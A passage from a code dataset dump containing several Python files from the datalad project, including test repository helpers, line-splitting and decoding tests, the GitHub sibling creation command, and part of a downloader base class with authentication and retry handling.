\"w\") as f:\n f.write(\"content to be annex-addurl'd\")\n remote_file_url = '{}/{}'.format(test_http_server.url, remote_file_name)\n self.create_info_file()\n self.create_file('test.dat', '123\\n', annex=False)\n self.repo.commit(\"Adding a basic INFO file and rudimentary load file for annex testing\")\n self.repo.add_url_to_file(\"test-annex.dat\", remote_file_url)\n self.repo.commit(\"Adding a rudimentary git-annex load file\")\n self.repo.drop(\"test-annex.dat\") # since available from URL\n\n def create_info_file(self):\n annex_version = external_versions['cmd:annex']\n git_version = external_versions['cmd:git']\n self.create_file('INFO.txt',\n \"Testrepo: %s\\n\"\n \"git: %s\\n\"\n \"annex: %s\\n\"\n \"datalad: %s\\n\"\n % (self.__class__, git_version, annex_version, __version__),\n annex=False)\n\n\nclass BasicGitTestRepo(TestRepo):\n \"\"\"Creates a basic test git repository.\"\"\"\n\n REPO_CLASS = GitRepo\n\n def populate(self):\n self.create_info_file()\n self.create_file('test.dat', '123\\n', annex=False)\n self.repo.commit(\"Adding a basic INFO file and rudimentary \"\n \"load file.\")\n\n def create_info_file(self):\n git_version = external_versions['cmd:git']\n 
self.create_file('INFO.txt',\n \"Testrepo: %s\\n\"\n \"git: %s\\n\"\n \"datalad: %s\\n\"\n % (self.__class__, git_version, __version__),\n annex=False)\n\n\nclass SubmoduleDataset(BasicAnnexTestRepo):\n\n def populate(self):\n\n super(SubmoduleDataset, self).populate()\n # add submodules\n annex = BasicAnnexTestRepo()\n annex.create()\n kw = dict(expect_stderr=True)\n self.repo.call_git(\n ['submodule', 'add', annex.url, 'subm 1'], **kw)\n self.repo.call_git(\n ['submodule', 'add', annex.url, '2'], **kw)\n self.repo.commit('Added subm 1 and 2.')\n self.repo.call_git(\n ['submodule', 'update', '--init', '--recursive'], **kw)\n # init annex in subdatasets\n for s in ('subm 1', '2'):\n AnnexRepo(opj(self.path, s), init=True)\n\n\nclass NestedDataset(BasicAnnexTestRepo):\n\n def populate(self):\n super(NestedDataset, self).populate()\n ds = SubmoduleDataset()\n ds.create()\n kw = dict(expect_stderr=True)\n self.repo.call_git(\n ['submodule', 'add', ds.url, 'sub dataset1'], **kw)\n self.repo.call_git(\n ['-C', opj(self.path, 'sub dataset1'),\n 'submodule', 'add', ds.url, 'sub sub dataset1'],\n **kw)\n GitRepo(opj(self.path, 'sub dataset1')).commit('Added sub dataset.')\n self.repo.commit('Added subdatasets.', options=[\"-a\"])\n self.repo.call_git(\n ['submodule', 'update', '--init', '--recursive'],\n **kw)\n # init all annexes\n for s in ('', 'sub dataset1', opj('sub dataset1', 'sub sub dataset1')):\n AnnexRepo(opj(self.path, s), init=True)\n\n\nclass InnerSubmodule(object):\n\n def __init__(self):\n self._ds = NestedDataset()\n\n @property\n def path(self):\n return opj(self._ds.path, 'sub dataset1', 'subm 1')\n\n @property\n def url(self):\n return get_local_file_url(self.path, compatibility='git')\n\n def create(self):\n self._ds.create()\n" }, { "alpha_fraction": 0.5893104076385498, "alphanum_fraction": 0.5922285318374634, "avg_line_length": 31.073890686035156, "blob_id": "b9d9ea12df6b57b6e7a22705b35ef51ed7266573", "content_id": "ac1d575e0b35eec5bec340ffd37d3406f9ff48b0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6546, "license_type": "permissive", "max_line_length": 79, "num_lines": 203, "path": "/datalad/runner/tests/test_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nfrom typing import Optional\nfrom unittest.mock import (\n call,\n patch,\n)\n\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_in,\n assert_is_none,\n)\n\nfrom ..utils import (\n AssemblingDecoderMixIn,\n LineSplitter,\n)\n\ntest_lines = [\n \"first line\",\n \"second line\",\n \"third line\",\n \"\"\n]\n\n\ndef _check_splitting_endings_separator(endings: list[str],\n separator: Optional[str] = None,\n keep_ends: bool = False,\n check_continuation: bool = False\n ) -> None:\n for line_ending in endings:\n line_splitter = LineSplitter(separator=separator, keep_ends=keep_ends)\n full_end = line_ending + separator if separator else line_ending\n if separator:\n expected_end = full_end if keep_ends else line_ending\n else:\n expected_end = line_ending if keep_ends else \"\"\n\n lines = line_splitter.process(\n full_end.join(test_lines)\n + full_end\n + (\"fourth \" if check_continuation else \"\")\n )\n assert_equal(\n lines,\n [line + expected_end for line in test_lines]\n )\n\n if check_continuation:\n assert_equal(line_splitter.remaining_data, \"fourth \")\n lines = line_splitter.process(\"line\" + full_end)\n assert_equal(\n lines,\n [\"fourth line\" + 
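These helpers are meant for datalad's own test suite, but a sketch of their intended use may help; `BasicGitTestRepo` is chosen here because, unlike the annex flavour, it does not rely on the test HTTP server fixture. The module pulls in test utilities, so pytest must be importable.

from datalad.tests.utils_testrepos import BasicGitTestRepo

testrepo = BasicGitTestRepo()        # picks a temporary directory itself
testrepo.create()                    # populates INFO.txt and test.dat, commits

print(testrepo.path)                 # working tree location
print(testrepo.url)                  # file:// URL usable for test clones

# additional payload can be added through the same helper used above
testrepo.create_file('extra.txt', 'some content\n', add=True)
testrepo.repo.commit('Add extra.txt')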
expected_end])\n assert_is_none(line_splitter.finish_processing())\n else:\n assert_is_none(line_splitter.finish_processing())\n\n\ndef test_line_splitter_basic() -> None:\n # expect lines without endings, split at standard line-endings\n _check_splitting_endings_separator([\"\\n\", \"\\r\\n\"])\n _check_splitting_endings_separator([\"\\n\", \"\\r\\n\"], check_continuation=True)\n\n\ndef test_line_splitter_basic_keep() -> None:\n # expect lines without endings, split at standard line-endings\n _check_splitting_endings_separator([\"\\n\", \"\\r\\n\"], keep_ends=True)\n _check_splitting_endings_separator(\n [\"\\n\", \"\\r\\n\"],\n keep_ends=True,\n check_continuation=True)\n\n\ndef test_line_splitter_zero() -> None:\n # expect lines without endings, split at standard line-endings\n _check_splitting_endings_separator([\"\\n\", \"\\r\\n\"], separator=\"\\x00\")\n _check_splitting_endings_separator(\n [\"\\n\", \"\\r\\n\"],\n separator=\"\\x00\",\n check_continuation=True)\n\n\ndef test_line_splitter_zero_keep() -> None:\n # expect lines without endings, split at standard line-endings\n _check_splitting_endings_separator(\n [\"\\n\", \"\\r\\n\"],\n separator=\"\\x00\",\n keep_ends=True)\n _check_splitting_endings_separator(\n [\"\\n\", \"\\r\\n\"],\n separator=\"\\x00\",\n keep_ends=True,\n check_continuation=True)\n\n\ndef test_line_splitter_corner_cases() -> None:\n line_splitter = LineSplitter()\n lines = line_splitter.process(\"\")\n assert_equal(lines, [])\n assert_equal(line_splitter.remaining_data, None)\n\n line_splitter = LineSplitter()\n lines = line_splitter.process(\"\")\n assert_equal(lines, [])\n lines = line_splitter.process(\"\\n\")\n assert_equal(lines, [\"\"])\n assert_equal(line_splitter.remaining_data, None)\n\n line_splitter = LineSplitter()\n lines = line_splitter.process(\" a \\f \\r\\n\")\n assert_equal(lines, [\" a \", \" \"])\n\n\ndef test_assembling_decoder_mix_in_basic() -> None:\n\n encoding = \"utf-8\"\n unicode_str = \"These are not ASCII: ä, ö, ü. These can be ASCII: a, o, u.\"\n data_bytes = unicode_str.encode(encoding)\n\n adm = AssemblingDecoderMixIn()\n\n single_result = \"\".join([\n adm.decode(1, bytes([data_byte]), encoding)\n for data_byte in data_bytes\n ])\n assert_equal(single_result, unicode_str)\n\n\ndef _decode_multiple(adm: AssemblingDecoderMixIn,\n encoded_strings: list[bytes],\n encoding: str,\n fixed_index: Optional[int] = None) -> list[str]:\n\n # Interleave decoding of multiple strings\n decoded_chars: list[list] = [list() for _ in range(len(encoded_strings))]\n for data_index in range(max([len(es) for es in encoded_strings])):\n for string_index in range(len(encoded_strings)):\n if data_index < len(encoded_strings[string_index]):\n decoded_char = adm.decode(\n string_index if fixed_index is None else fixed_index,\n bytes([encoded_strings[string_index][data_index]]),\n encoding)\n decoded_chars[string_index].append(decoded_char)\n return [\"\".join(decoded_list) for decoded_list in decoded_chars]\n\n\ndef test_assembling_decoder_mix_in_multiple() -> None:\n encoding = \"utf-8\"\n unicode_strings = [\n \"These are not ASCII: ä, ö, ü. 
These can be ASCII: a, o, u.\",\n \"Some other weird stuff: öäöß.\",\n \"Even weirder: 🐷🐶.\",\n ]\n encoded_strings = [\n unicode_string.encode(encoding)\n for unicode_string in unicode_strings\n ]\n\n adm = AssemblingDecoderMixIn()\n decoded_strings = _decode_multiple(adm, encoded_strings, encoding)\n assert_equal(unicode_strings, decoded_strings)\n\n\ndef test_assembling_decoder_mix_in_multiple_fail() -> None:\n encoding = \"utf-8\"\n unicode_strings = [\n \"A: ä, ö, ü.\",\n \"B: öäöß.\",\n \"C: 🐷🐶.\",\n ]\n encoded_strings = [\n unicode_string.encode(encoding)\n for unicode_string in unicode_strings\n ]\n\n adm = AssemblingDecoderMixIn()\n decoded_strings = _decode_multiple(adm, encoded_strings, encoding, 0)\n # Because the strings are not separated, we do not expect any proper\n # output after single-byte encoded chars.\n assert_equal(decoded_strings, [\"A: \", \"B: \", \"C: \"])\n\n\ndef test_assembling_decoder_mix_in_warning() -> None:\n encoding = \"utf-8\"\n data_bytes = \"🐷🐶.\".encode(encoding)\n\n adm = AssemblingDecoderMixIn()\n\n with patch(\"datalad.runner.utils.logger\") as logger_mock:\n result = adm.decode(1, data_bytes[0:1], encoding)\n assert_equal(result, '')\n del adm\n assert_in(\n call.warning(\"unprocessed data in AssemblingDecoderMixIn\"),\n logger_mock.mock_calls)\n assert_in(\n call.debug(\n \"unprocessed data in AssemblingDecoderMixIn:\\n\"\n \"fd: 1, data: b'\\\\xf0'\\n\"),\n logger_mock.mock_calls)\n" }, { "alpha_fraction": 0.5795660018920898, "alphanum_fraction": 0.5809633135795593, "avg_line_length": 38.75817108154297, "blob_id": "50be14f75cca6ae98d837be9cd4368f72c411c42", "content_id": "c1182be1ce6aa538951d54adda08f4afc2776588", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12166, "license_type": "permissive", "max_line_length": 88, "num_lines": 306, "path": "/datalad/distributed/create_sibling_github.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for creating a publication target on GitHub\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nimport warnings\nfrom urllib.parse import urljoin\n\nimport requests\n\nfrom datalad.distributed.create_sibling_ghlike import (\n _create_sibling,\n _GitHubLike,\n)\nfrom datalad.distribution.dataset import datasetmethod\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.support.constraints import (\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.param import Parameter\n\nlgr = logging.getLogger('datalad.distribution.create_sibling_github')\n\n\nclass _GitHub(_GitHubLike):\n \"\"\"Customizations for the GitHub platform\"\"\"\n name = 'github'\n fullname = 'GitHub'\n response_code_unauthorized = 401\n create_org_repo_endpoint = 'orgs/{organization}/repos'\n create_user_repo_endpoint = 'user/repos'\n get_authenticated_user_endpoint = 'user'\n get_repo_info_endpoint = 'repos/{user}/{repo}'\n extra_remote_settings = {\n # first make sure that annex doesn't touch this one\n # but respect any existing config\n 'annex-ignore': 
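The incremental splitting behaviour verified above translates into the following caller-side sketch, feeding data in arbitrary chunks as it might arrive from a subprocess.

from datalad.runner.utils import LineSplitter

splitter = LineSplitter()            # split on standard line endings

assert splitter.process("first li") == []
assert splitter.process("ne\nsecond line\nthird") == ["first line",
                                                      "second line"]
assert splitter.remaining_data == "third"    # incomplete line stays buffered

assert splitter.process(" line\n") == ["third line"]
assert splitter.finish_processing() is None  # nothing left over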
'true',\n # first push should separately push active branch first\n # to overcome github issue of choosing \"default\" branch\n # alphabetically if its name does not match the default\n # branch for the user (or organization) which now defaults\n # to \"main\"\n 'datalad-push-default-first': 'true'\n }\n\n def repo_create_response(self, r):\n \"\"\"\n At present the only difference from the GHlike implementation\n is the detection of an already existing repo in a 422 response.\n \"\"\"\n try:\n response = r.json()\n except Exception as e:\n lgr.debug('Cannot get JSON payload of %s [%s]' , r, e)\n response = {}\n lgr.debug('%s responded with %s %s', self.fullname, r, response)\n if r.status_code == requests.codes.created:\n return dict(\n status='ok',\n preexisted=False,\n # perform some normalization\n reponame=response.get('name'),\n private=response.get('private'),\n clone_url=response.get('clone_url'),\n ssh_url=response.get('ssh_url'),\n html_url=response.get('html_url'),\n # and also return in full\n host_response=response,\n )\n elif r.status_code == requests.codes.unprocessable and \\\n any('already exist' in e.get('message', '')\n for e in response.get('errors', [])):\n return dict(\n status='impossible',\n message='repository already exists',\n preexisted=True,\n )\n elif r.status_code == self.response_code_unauthorized:\n return dict(\n status='error',\n message=('unauthorized: %s', response.get('message')),\n )\n # make sure any error-like situation causes noise\n r.raise_for_status()\n # catch-all\n raise RuntimeError(f'Unexpected host response: {response}')\n\n def repo_delete_request(self, orguser, reponame):\n r = requests.delete(\n urljoin(\n self.api_url,\n self.get_repo_info_endpoint.format(\n user=orguser,\n repo=reponame)),\n headers=self.request_headers,\n )\n # make sure any error-like situation causes noise\n r.raise_for_status()\n\n\n@build_doc\nclass CreateSiblingGithub(Interface):\n \"\"\"Create dataset sibling on GitHub.org (or an enterprise deployment).\n\n GitHub is a popular commercial solution for code hosting and collaborative\n development. GitHub cannot host dataset content (but see LFS,\n http://handbook.datalad.org/r.html?LFS). However, in combination with other\n data sources and siblings, publishing a dataset to GitHub can facilitate\n distribution and exchange, while still allowing any dataset consumer to\n obtain actual data content from alternative sources.\n\n In order to be able to use this command, a personal access token has to be\n generated on the platform (Account->Settings->Developer Settings->Personal\n access tokens->Generate new token).\n\n This command can be configured with\n \"datalad.create-sibling-ghlike.extra-remote-settings.NETLOC.KEY=VALUE\" in\n order to add any local KEY = VALUE configuration to the created sibling in\n the local `.git/config` file. NETLOC is the domain of the Github instance to\n apply the configuration for.\n This leads to a behavior that is equivalent to calling datalad's\n ``siblings('configure', ...)``||``siblings configure`` command with the\n respective KEY-VALUE pair after creating the sibling.\n The configuration, like any other, could be set at user- or system level, so\n users do not need to add this configuration to every sibling created with\n the service at NETLOC themselves.\n\n .. versionchanged:: 0.16\n || REFLOW >>\n The API has been aligned with the some\n ``create_sibling_...||create-sibling-...`` commands of other GitHub-like\n services, such as GOGS, GIN, GitTea.<< REFLOW ||\n\n .. 
deprecated:: 0.16\n The ``dryrun||--dryrun`` option will be removed in a future release, use\n the renamed ``dry_run||--dry-run`` option instead.\n The ``github_login||--github-login`` option will be removed in a future\n release, use the ``credential||--credential`` option instead.\n The ``github_organization||--github-organization`` option will be\n removed in a future release, prefix the reposity name with ``<org>/``\n instead.\n \"\"\"\n\n _examples_ = [\n dict(text=\"Use a new sibling on GIN as a common data source that is \"\n \"auto-available when cloning from GitHub\",\n code_py=\"\"\"\\\n > ds = Dataset('.')\n\n # the sibling on GIN will host data content\n > ds.create_sibling_gin('myrepo', name='gin')\n\n # the sibling on GitHub will be used for collaborative work\n > ds.create_sibling_github('myrepo', name='github')\n\n # register the storage of the public GIN repo as a data source\n > ds.siblings('configure', name='gin', as_common_datasrc='gin-storage')\n\n # announce its availability on github\n > ds.push(to='github')\n \"\"\",\n code_cmd=\"\"\"\\\n % datalad create-sibling-gin myrepo -s gin\n\n # the sibling on GitHub will be used for collaborative work\n % datalad create-sibling-github myrepo -s github\n\n # register the storage of the public GIN repo as a data source\n % datalad siblings configure -s gin --as-common-datasrc gin-storage\n\n # announce its availability on github\n % datalad push --to github\n \"\"\",\n ),\n ]\n\n _params_ = _GitHub.create_sibling_params\n _params_['api']._doc = \"\"\"\\\n URL of the GitHub instance API\"\"\"\n # special casing for deprecated mode\n _params_['existing'].constraints = EnsureChoice(\n 'skip', 'error', 'reconfigure', 'replace')\n _params_['existing']._doc += \"\"\"\\\n DEPRECATED DANGER ZONE: With 'replace', an existing repository will be\n irreversibly removed, re-initialized, and the sibling\n (re-)configured (thus implies 'reconfigure').\n `replace` could lead to data loss! In interactive sessions a\n confirmation prompt is shown, an exception is raised in non-interactive\n sessions. The 'replace' mode will be removed in a future release.\"\"\"\n # deprecated options\n _params_.update(\n github_login=Parameter(\n args=('--github-login',),\n constraints=EnsureStr() | EnsureNone(),\n metavar='TOKEN',\n doc=\"\"\"Deprecated, use the credential parameter instead.\n If given must be a personal access token.\"\"\"),\n github_organization=Parameter(\n args=('--github-organization',),\n constraints=EnsureStr() | EnsureNone(),\n metavar='NAME',\n doc=\"\"\"Deprecated, prepend a repo name with an '<orgname>/'\n prefix instead.\"\"\"),\n dryrun=Parameter(\n args=(\"--dryrun\",),\n action=\"store_true\",\n doc=\"\"\"Deprecated. 
Use the renamed ``dry_run||--dry-run``\n parameter\"\"\"),\n )\n\n @staticmethod\n @datasetmethod(name='create_sibling_github')\n @eval_results\n def __call__(\n reponame,\n *,\n dataset=None,\n recursive=False,\n recursion_limit=None,\n name='github',\n existing='error',\n github_login=None,\n credential=None,\n github_organization=None,\n access_protocol='https',\n publish_depends=None,\n private=False,\n description=None,\n dryrun=False,\n dry_run=False,\n api='https://api.github.com'):\n if dryrun and not dry_run:\n # the old one is used, and not in agreement with the new one\n warnings.warn(\n \"datalad-create-sibling-github's `dryrun` option is \"\n \"deprecated and will be removed in a future release, \"\n \"use the renamed `dry_run/--dry-run` option instead.\",\n DeprecationWarning)\n dry_run = dryrun\n\n if api == 'https://api.github.com':\n token_info = \\\n 'Visit https://github.com/settings/tokens to create a token.'\n else:\n token_info = 'Log into the platform, and visit [Account->' \\\n 'Settings->Developer Settings->' \\\n 'Personal access tokens->Generate new token] ' \\\n 'to create a new token.'\n if github_login:\n warnings.warn(\n \"datalad-create-sibling-github's `github_login` option is \"\n \"deprecated and will be removed in a future release, \"\n \"use the `credential` option instead.\",\n DeprecationWarning)\n from unittest.mock import patch\n\n # shoehorn the token into an env var to read it out using the\n # normal procedures internally\n with patch.dict(\n 'os.environ',\n {'DATALAD_CREDENTIAL_GITHUBLOGINARG_TOKEN': github_login}):\n platform = _GitHub(\n api, 'githubloginarg', require_token=not dry_run,\n token_info=token_info)\n else:\n platform = _GitHub(api, credential, require_token=not dry_run,\n token_info=token_info)\n\n if github_organization:\n warnings.warn(\n \"datalad-create-sibling-github's `github_organization` \"\n \"option is deprecated and will be removed in a future \"\n \"release, prefix the reposity name with `<org>/` instead.\",\n DeprecationWarning)\n reponame = f'{github_organization}/{reponame}'\n\n yield from _create_sibling(\n platform=platform,\n reponame=reponame,\n dataset=dataset,\n recursive=recursive,\n recursion_limit=recursion_limit,\n name=name,\n existing=existing,\n access_protocol=access_protocol,\n publish_depends=publish_depends,\n private=private,\n description=description,\n dry_run=dry_run,\n )\n" }, { "alpha_fraction": 0.5360962748527527, "alphanum_fraction": 0.5508021116256714, "avg_line_length": 36.400001525878906, "blob_id": "f7834885d88fc3b720d966fb82c4b9954f02aac1", "content_id": "0389e5b71eaa7035627fb0f7af926daa908de85e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 748, "license_type": "permissive", "max_line_length": 87, "num_lines": 20, "path": "/datalad/cmdline/main.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\n.. deprecated:: 0.16\n datalad.cmdline.main was replaced by datalad.cli.main\n\"\"\"\n\nimport warnings\nwarnings.warn(\"datalad.cmdline.main was replaced by datalad.cli.main in \"\n \"datalad 0.16. 
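A usage sketch for the command above; the dataset path and repository name are placeholders, and `dry_run=True` keeps it side-effect free (no token is required in that mode, per the implementation above).

from datalad.api import Dataset

ds = Dataset('/path/to/dataset')     # placeholder; must be an existing dataset

ds.create_sibling_github(
    'my-org/myrepo',                 # '<org>/' prefix instead of the
                                     # deprecated --github-organization
    name='github',
    private=True,
    existing='skip',
    dry_run=True,                    # only report what would be done
)

# once satisfied, drop dry_run and publish with: ds.push(to='github')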
Please update and reinstall extensions.\",\n DeprecationWarning)\n\nfrom datalad.cli.main import main\nfrom datalad.cli.parser import setup_parser\n" }, { "alpha_fraction": 0.5630257725715637, "alphanum_fraction": 0.5647014379501343, "avg_line_length": 38.30376434326172, "blob_id": "a5a8370da909e8eb6f86a848b7417bd39994a799", "content_id": "04a8b03a3ebb85956811f020f76626d29164e5e0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 29242, "license_type": "permissive", "max_line_length": 119, "num_lines": 744, "path": "/datalad/downloaders/base.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Provide access to stuff (html, data files) via HTTP and HTTPS\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport msgpack\nimport os\nimport sys\nimport time\n\nfrom abc import ABCMeta, abstractmethod\nimport os.path as op\nfrom os.path import exists, join as opj, isdir\n\n\nfrom .. import cfg\nfrom ..ui import ui\nfrom ..utils import (\n auto_repr,\n ensure_unicode,\n unlink,\n)\nfrom .credentials import (\n CompositeCredential,\n)\nfrom datalad.downloaders import CREDENTIAL_TYPES\nfrom ..support.exceptions import (\n AccessDeniedError,\n AccessPermissionExpiredError,\n AnonymousAccessDeniedError,\n CapturedException,\n DownloadError,\n IncompleteDownloadError,\n UnaccountedDownloadError,\n)\nfrom ..support.locking import (\n InterProcessLock,\n try_lock,\n try_lock_informatively,\n)\n\nfrom logging import getLogger\nlgr = getLogger('datalad.downloaders')\n\n\n# TODO: remove headers, HTTP specific\n@auto_repr\nclass DownloaderSession(object):\n \"\"\"Base class to encapsulate information and possibly a session to download the content\n\n The idea is that corresponding downloader provides all necessary\n information and if necessary some kind of session to facilitate\n .download method\n \"\"\"\n\n def __init__(self, size=None, filename=None, url=None, headers=None):\n self.size = size\n self.filename = filename\n self.headers = headers\n self.url = url\n\n def download(self, f=None, pbar=None, size=None):\n raise NotImplementedError(\"must be implemented in subclases\")\n\n # TODO: get_status ?\n\n\n@auto_repr\nclass BaseDownloader(object, metaclass=ABCMeta):\n \"\"\"Base class for the downloaders\"\"\"\n\n _DEFAULT_AUTHENTICATOR = None\n _DOWNLOAD_SIZE_TO_VERIFY_AUTH = 10000\n\n def __init__(self, credential=None, authenticator=None):\n \"\"\"\n\n Parameters\n ----------\n credential: Credential, optional\n Provides necessary credential fields to be used by authenticator\n authenticator: Authenticator, optional\n Authenticator to use for authentication.\n \"\"\"\n if not authenticator and self._DEFAULT_AUTHENTICATOR:\n authenticator = self._DEFAULT_AUTHENTICATOR()\n\n if authenticator and authenticator.requires_authentication:\n if not credential and not authenticator.allows_anonymous:\n msg = \"Both authenticator and credentials must be provided.\" \\\n \" Got only authenticator %s\" % repr(authenticator)\n if ui.yesno(\n title=msg,\n text=\"Do you want to enter %s credentials to be used?\" % 
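The effect of the shim above is simply that both import paths resolve to the same CLI entry point, with the old one emitting a DeprecationWarning on import; a quick check:

from datalad.cli.main import main as new_main          # current location
from datalad.cmdline.main import main as old_main      # warns on import

assert old_main is new_main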
authenticator.DEFAULT_CREDENTIAL_TYPE\n ):\n credential = CREDENTIAL_TYPES[authenticator.DEFAULT_CREDENTIAL_TYPE](\n \"session-only-for-%s\" % id(authenticator))\n credential.enter_new()\n # TODO: give an option to store those credentials, and generate a basic provider\n # record?\n else:\n raise ValueError(msg)\n self.credential = credential\n self.authenticator = authenticator\n self._cache = None # for fetches, not downloads\n\n def access(self, method, url, allow_old_session=True, **kwargs):\n \"\"\"Generic decorator to manage access to the URL via some method\n\n Parameters\n ----------\n method : callable\n A callable, usually a method of the same class, which we decorate\n with access handling, and pass url as the first argument\n url : string\n URL to access\n *args, **kwargs\n Passed into the method call\n\n Returns\n -------\n None or bytes\n \"\"\"\n # TODO: possibly wrap this logic outside within a decorator, which\n # would just call the corresponding method\n authenticator = self.authenticator\n if authenticator:\n needs_authentication = authenticator.requires_authentication\n else:\n needs_authentication = self.credential\n\n # TODO: not sure yet, where is/are the right spot(s) to pass the URL:\n if hasattr(self.credential, 'set_context'):\n lgr.debug(\"set credential context as %s\", url)\n self.credential.set_context(auth_url=url)\n\n attempt, incomplete_attempt = 0, 0\n result = None\n credential_was_refreshed = False\n while True:\n attempt += 1\n if attempt > 20:\n # are we stuck in a loop somehow? I think logic doesn't allow this atm\n raise RuntimeError(\"Got to the %d'th iteration while trying to download %s\" % (attempt, url))\n exc_info = None\n msg_types = ''\n supported_auth_types = []\n used_old_session = False\n # Lock must be instantiated here, within each thread to avoid problems\n # when used in our parallel.ProducerConsumer\n # see https://github.com/datalad/datalad/issues/6483\n interp_lock = InterProcessLock(\n op.join(cfg.obtain('datalad.locations.locks'),\n 'downloader-auth.lck')\n )\n\n try:\n # Try to lock since it might desire to ask for credentials, but still allow to time out at 5 minutes\n # while providing informative message on what other process might be holding it.\n with try_lock_informatively(interp_lock, purpose=\"establish download session\", proceed_unlocked=False):\n used_old_session = self._establish_session(url, allow_old=allow_old_session)\n if not allow_old_session:\n assert(not used_old_session)\n lgr.log(5, \"Calling out into %s for %s\", method, url)\n result = method(url, **kwargs)\n # assume success if no puke etc\n break\n except AccessDeniedError as e:\n ce = CapturedException(e)\n if hasattr(e, 'status') and e.status == 429:\n # Too many requests.\n # We can retry by continuing the loop.\n time.sleep(0.5*(attempt**1.2))\n continue\n\n if isinstance(e, AnonymousAccessDeniedError):\n access_denied = \"Anonymous access\"\n else:\n access_denied = \"Access\"\n lgr.debug(\"%s was denied: %s\", access_denied, ce)\n supported_auth_types = e.supported_types\n exc_info = sys.exc_info()\n\n if supported_auth_types:\n msg_types = \\\n \" The failure response indicated that following \" \\\n \"authentication types should be used: %s\" % (\n ', '.join(supported_auth_types))\n # keep inside except https://github.com/datalad/datalad/issues/3621\n # TODO: what if it was anonimous attempt without authentication,\n # so it is not \"requires_authentication\" but rather\n # \"supports_authentication\"? 
We should not report below in\n # _get_new_credential that authentication has failed then since there\n # were no authentication. We might need a custom exception to\n # be caught above about that\n\n allow_old_session = False # we will either raise or auth\n # in case of parallel downloaders, one would succeed to get the\n # lock, ask user if necessary and other processes would just wait\n # got it to return back\n with try_lock(interp_lock) as got_lock:\n if got_lock:\n if isinstance(e, AccessPermissionExpiredError) \\\n and not credential_was_refreshed \\\n and self.credential \\\n and isinstance(self.credential, CompositeCredential):\n lgr.debug(\"Requesting refresh of the credential (once)\")\n self.credential.refresh()\n # to avoid a loop of refreshes without giving a chance to\n # enter a new one, we will allow only a single refresh\n credential_was_refreshed = True\n else:\n self._handle_authentication(url, needs_authentication, e, ce,\n access_denied, msg_types,\n supported_auth_types,\n used_old_session)\n else:\n lgr.debug(\"The lock for downloader authentication was not available.\")\n # We will just wait for the lock to become available,\n # and redo connect/download attempt\n continue\n\n except IncompleteDownloadError as e:\n ce = CapturedException(e)\n exc_info = sys.exc_info()\n incomplete_attempt += 1\n if incomplete_attempt > 5:\n # give up\n raise\n lgr.debug(\"Failed to download fully, will try again: %s\", ce)\n # TODO: may be fail earlier than after 20 attempts in such a case?\n except DownloadError:\n # TODO Handle some known ones, possibly allow for a few retries, otherwise just let it go!\n raise\n\n return result\n\n def _handle_authentication(self, url, needs_authentication, e, ce,\n access_denied, msg_types, supported_auth_types,\n used_old_session):\n if needs_authentication:\n # so we knew it needs authentication\n if not used_old_session:\n # we did use new cookies, we knew that authentication is needed\n # but still failed. So possible cases:\n # 1. authentication credentials changed/were revoked\n # - allow user to re-enter credentials\n # 2. authentication mechanisms changed\n # - we can't do anything here about that\n # 3. bug in out code which would render\n # authentication/cookie handling\n # ineffective\n # - not sure what to do about it\n if not ui.is_interactive:\n lgr.error(\n \"Interface is non interactive, so we are \"\n \"reraising: %s\", ce)\n raise e\n self._enter_credentials(\n url,\n denied_msg=access_denied,\n auth_types=supported_auth_types,\n new_provider=False)\n else: # None or False\n if needs_authentication is False:\n # those urls must or should NOT require authentication\n # but we got denied\n raise DownloadError(\n \"Failed to download from %s, which must be available\"\n \"without authentication but access was denied. 
